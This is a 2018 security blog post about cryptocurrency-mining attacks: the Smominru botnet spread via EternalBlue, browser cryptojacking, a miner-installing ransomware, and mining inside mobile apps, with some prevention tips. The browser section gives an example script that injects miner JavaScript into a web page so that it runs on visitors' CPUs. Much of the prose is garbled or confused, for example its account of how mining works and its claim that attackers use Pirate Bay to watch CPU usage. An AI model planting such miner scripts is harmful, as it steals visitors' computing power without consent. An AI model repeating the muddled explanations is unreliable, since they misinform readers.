Monday 2 April 2018

CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


Cryptocurrency mining is a kind of digital currency which transfer across the internet, By using cryptocurrency mining people started to earn money in online
In recent days many people began to make money by this process, where it calculates the hash rate for every payment for (e.g.) if you are transferring money through online the interest rate of the required transaction is shared to the bank by which he moved capital
Here Cryptocurrency mining started to capture the hash rate for each payment, and some required share get passed to the person who mines it and by each transaction, it generated a blockchain and based on its other new bitcoins gets created

CRYPTOCURRENCY MINING MALWARE INFECTED OVER HALF-MILLION PCS USING NSA EXPLOIT

Several Cybersecurity firms are reporting on new cryptocurrency mining viruses that are being spread using Eternal Blue NSA exploit the hacking group Shadow Brokers leaked that
Researchers from Proof point discovered a massive global botnet dubbed “Smominru” that is using Eternal Blue SMB exploit (CVE-2017-0144) is the primary function is used to infect Windows computer to secretly mine Monero cryptocurrency, worth about millions of dollars, for its master
In 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows. According to researchers and based on the hash power obtained by Monero Payment address the control of the botnet get raised twice than the regular botnets
This botnet has already mined over 8,900 Monero, valued about a range of $3.6 million, at the rate of roughly 24 Monero per day and by using it they started to steal millions of computers, and it mainly affects over Russia, India and Taiwan
A proof point of researchers says that cybercriminals are using at least 25 machines to scan the internet to find vulnerable Windows computer and also using leaked NSA’s RDP protocol exploit of Esteem Audit (CVE-2017-0176) for infection.
Want amine is one of the recent Eternal Blue exploit to infect computers to mine Monero cryptocurrency, and it’s was harder to detect by any antivirus, and it affects many companies for nearly about weeks or over months
Attackers started to use Crypto jacking, used as a browser-based JavaScript code, and cryptocurrency miners utilise this method for  website visitors CPUs power to mine cryptocurrencies for monetisation

BROWSER-BASED CRYPTOCURRENCY MINING:

Browser-based cryptocurrency mining is a part of mining process that performed through your browser, and it’s one of the oldest methods launched in 2011, and it works on based on some scripts and it different from file-based cryptocurrency which involves downloading and executing a detectable files
Bitcoin plus is one of the methods to mine your browser. we can generate a JavaScript code, and once we inject the JavaScript code on the web page when a visitor gets signup to the page automatically the page gets mined, and browser-based mining takes place, and the mined Javascript code for your reference
Example Script:
  1. < Script src = https: //testphp.vulnweb.com/lib/testphp.min.js></script>
  2. < Script > Var miner = newcognitive.User(‘ < site - key > ’, ‘john - days’);
  3. Start(); < /Script>
Once the required codes get executed on your website your browser gets started to mine, and it also increases the load of your CPU session, and by this method, the end user can be easily get profited

PREVENTION FROM BROWSER CRYPTOCURRENCY MINING:

Apart from ransomware the cryptocurrency mining malware place a vital role in our daily life and this mining is mainly used to mine your website
Most attackers use Pirate bay to look over the CPU process usage, we can also use it to detect the CPU usage of your system, and we can check out if any unknown website or mining website are running over, by the way
By the way, we can detect many mined sites, or we also have several browsers add-on to identify the mined websites, and they are as follows.
  • Use No Coin Extension
  • Use Minor Block Chrome Extension
  • Block coin mining domains in hosts file
  • Use no scripts in Firefox

HOW CRYPTOCURRENCY MINING ACHIEVED THROUGH RANSOMWARE:

Cryptocurrency mining can also be done using ransomware techniques, and here a new ransomware miner called the Trojan-Ransom.Win32.Linkup a new kind of ransomware it does not encrypt your files it just creates a mining robot on your system
Link-up ransomware creates a fake websites get created on your system and by this site if a person uses it redirect your site to some other site and by this through the add on’s on fake site credits some share amount to the miner
By this ransom it ask you to download some malware files, and once you installed it automatically download some bitcoin mining software
When  the  victim clicks the required software it gets processed and it makes your CPU or system runs faster and consumes higher energy
It further leads to increase your electric bill rate higher, based on the electric energy consumed  the crypto miners get some shares6
Linkup ransomware is also a different type of other malware like crypto locker, and it was also ransomware which hits  a virus on US police department and asked to pay $800 bitcoins, and the virus is removed once the demanded amount paid to render it more concerning than linkup

MOBILE CRYPTOCURRENCY MALWARE ATTACKS:

Cryptocurrency Mining malware attacks are started to affect mobile devices by passing mined code on android apps, and it’s been affecting most of the android users who download some legitimate-looking apps that are packed with some codes that “mines” for hackers without the user’s knowledge
These attacks are already happening in North America and Russia, and half of the cryptocurrency mining malware attacks are in Russia, and 20 percent are in the US, and a recent spate of attackers started to send some fake message of phishing attacks in Australia, and it tries to convince the victim to download some mining malware to their phones
One example of mobile cryptocurrency mining malware that Symantec sends a Motherboard appeared to be a fully-functioning crossword puzzle game, app but in the background, it was fetching some mining cryptocurrencies and by running the mined apps may drain your battery and make your Phone less responsive be aware before you started to use an unknown apps

OVERALL CRYPTOCURRENCY MINING USED BY THE ATTACKERS:

CONCLUSION:

Cryptocurrency mining attacks can spread using various phases like botnets, browser-based using JavaScript mined codes, and it also affects mobile phone through some malicious apps and by using this cryptocurrency mining many attackers started to earn money, and you can check it through some bitcoin apps that are available on the internet
Reference Links:

AUTHOR

RamKumar G
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/
Posted by at No comments:
Labels: , , , , ,
Subscribe to: Posts (Atom)